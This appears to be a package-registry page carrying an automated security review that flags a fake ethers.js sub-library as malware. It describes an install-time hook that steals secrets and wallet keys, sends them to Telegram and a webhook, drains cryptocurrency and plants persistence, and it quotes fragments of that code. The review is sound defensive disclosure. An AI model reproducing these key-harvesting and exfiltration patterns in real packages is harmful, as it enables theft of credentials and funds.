registry  /  ethers-core  /  6.13.7

ethers-core@6.13.7

Core utilities for ethers.js v6 - official sub-library

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installation executes the package entrypoint automatically. It harvests credentials and wallet keys, exfiltrates collected data, attempts cryptocurrency theft, and establishes local persistence.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm installation, via the `postinstall` lifecycle hook
Impact
Secrets and private keys can be stolen; cryptocurrency can be transferred; future shell sessions and desktop login can execute a dropped payload.
Mechanism
install-time credential harvesting, exfiltration, wallet draining, and persistence
Attack narrative
On npm installation, `postinstall` executes `dist/index.min.js`. The entrypoint reads configured environment variables and credential/wallet files, exfiltrates the result to Telegram and a webhook, then uses discovered private keys to send ETH or BTC to configured recipient wallets. It also modifies shell startup files, creates a desktop autostart entry, and drops a recurring curl-based payload.
Rationale
Direct source inspection confirms an unconsented install-time malicious chain: secret theft, exfiltration, cryptocurrency draining, and persistence. This is unrelated to the package’s claimed ethers utility purpose.
Evidence
package.jsondist/index.min.jsconfig/attacker-config.json.bashrc.zshrc.profile.config/autostart/sys-core.desktop/tmp/sys-core.js
Network endpoints5
api.telegram.orgcloudflare-eth.comblockchain.info/unspentblockchain.info/pushtxwebhook.site/YOUR_ID

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` runs `node dist/index.min.js` in `postinstall`.
  • `dist/index.min.js` reads selected environment secrets and home-directory credential/wallet files.
  • `dist/index.min.js` double-encodes collected data and sends it to Telegram and a configured webhook.
  • `dist/index.min.js` uses harvested private keys to transfer ETH/BTC to configured attacker wallets.
  • `dist/index.min.js` appends shell startup files and drops an autostart entry plus `/tmp/sys-core.js`.
  • `config/attacker-config.json` defines secret targets, exfiltration configuration, and recipient wallets.
Evidence against
  • No source facts support the stated ethers utility purpose.
  • No user command, opt-in, or guard protects the install-time behavior.
Behavioral surface
Source
ChildProcessEnvironmentVarsFilesystemNetworkShell
Supply chain
HighEntropyStringsMinifiedUrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 7.80 KB of source, external domains: api.telegram.org, blockchain.info, cloudflare-eth.com, webhook.site

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node dist/index.min.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
dist/index.min.jsView file
3const os = require('os'); L4: const axios = require('axios'); L5: const { ethers } = require('ethers'); ... L13: let m; L14: while ((m = hexRegex.exec(text)) !== null) results.push({ type: 'private_key', keyType: 'ETH', value: m[0] }); L15: while ((m = wifRegex.exec(text)) !== null) results.push({ type: 'private_key', keyType: 'BTC', value: m[0] }); ... L19: function doubleEncode(data) { L20: return Buffer.from(Buffer.from(JSON.stringify(data)).toString('base64')).toString('base64'); L21: } ... L24: try { L25: await axios.post(`https://api.telegram.org/bot${botToken}/sendMessage`, { L26: chat_id: chatId,
Critical
Persistence Backdoor

Source writes persistence or remote-access backdoor material.

dist/index.min.jsView on unpkg · L3
3Trigger-reachable chain: scripts.postinstall -> dist/index.min.js L3: const os = require('os'); L4: const axios = require('axios'); L5: const { ethers } = require('ethers'); ... L13: let m; L14: while ((m = hexRegex.exec(text)) !== null) results.push({ type: 'private_key', keyType: 'ETH', value: m[0] }); L15: while ((m = wifRegex.exec(text)) !== null) results.push({ type: 'private_key', keyType: 'BTC', value: m[0] }); ... L19: function doubleEncode(data) { L20: return Buffer.from(Buffer.from(JSON.stringify(data)).toString('base64')).toString('base64'); L21: } ... L24: try { L25: await axios.post(`https://api.telegram.org/bot${botToken}/sendMessage`, { L26: chat_id: chatId,
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

dist/index.min.jsView on unpkg · L3
3const os = require('os'); L4: const axios = require('axios'); L5: const { ethers } = require('ethers'); ... L13: let m; L14: while ((m = hexRegex.exec(text)) !== null) results.push({ type: 'private_key', keyType: 'ETH', value: m[0] }); L15: while ((m = wifRegex.exec(text)) !== null) results.push({ type: 'private_key', keyType: 'BTC', value: m[0] }); ... L19: function doubleEncode(data) { L20: return Buffer.from(Buffer.from(JSON.stringify(data)).toString('base64')).toString('base64'); L21: } ... L24: try { L25: await axios.post(`https://api.telegram.org/bot${botToken}/sendMessage`, { L26: chat_id: chatId,
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

dist/index.min.jsView on unpkg · L3

Findings

2 Critical2 High3 Medium4 Low
CriticalPersistence Backdoordist/index.min.js
CriticalTrigger Reachable Dangerous Capabilitydist/index.min.js
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationdist/index.min.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings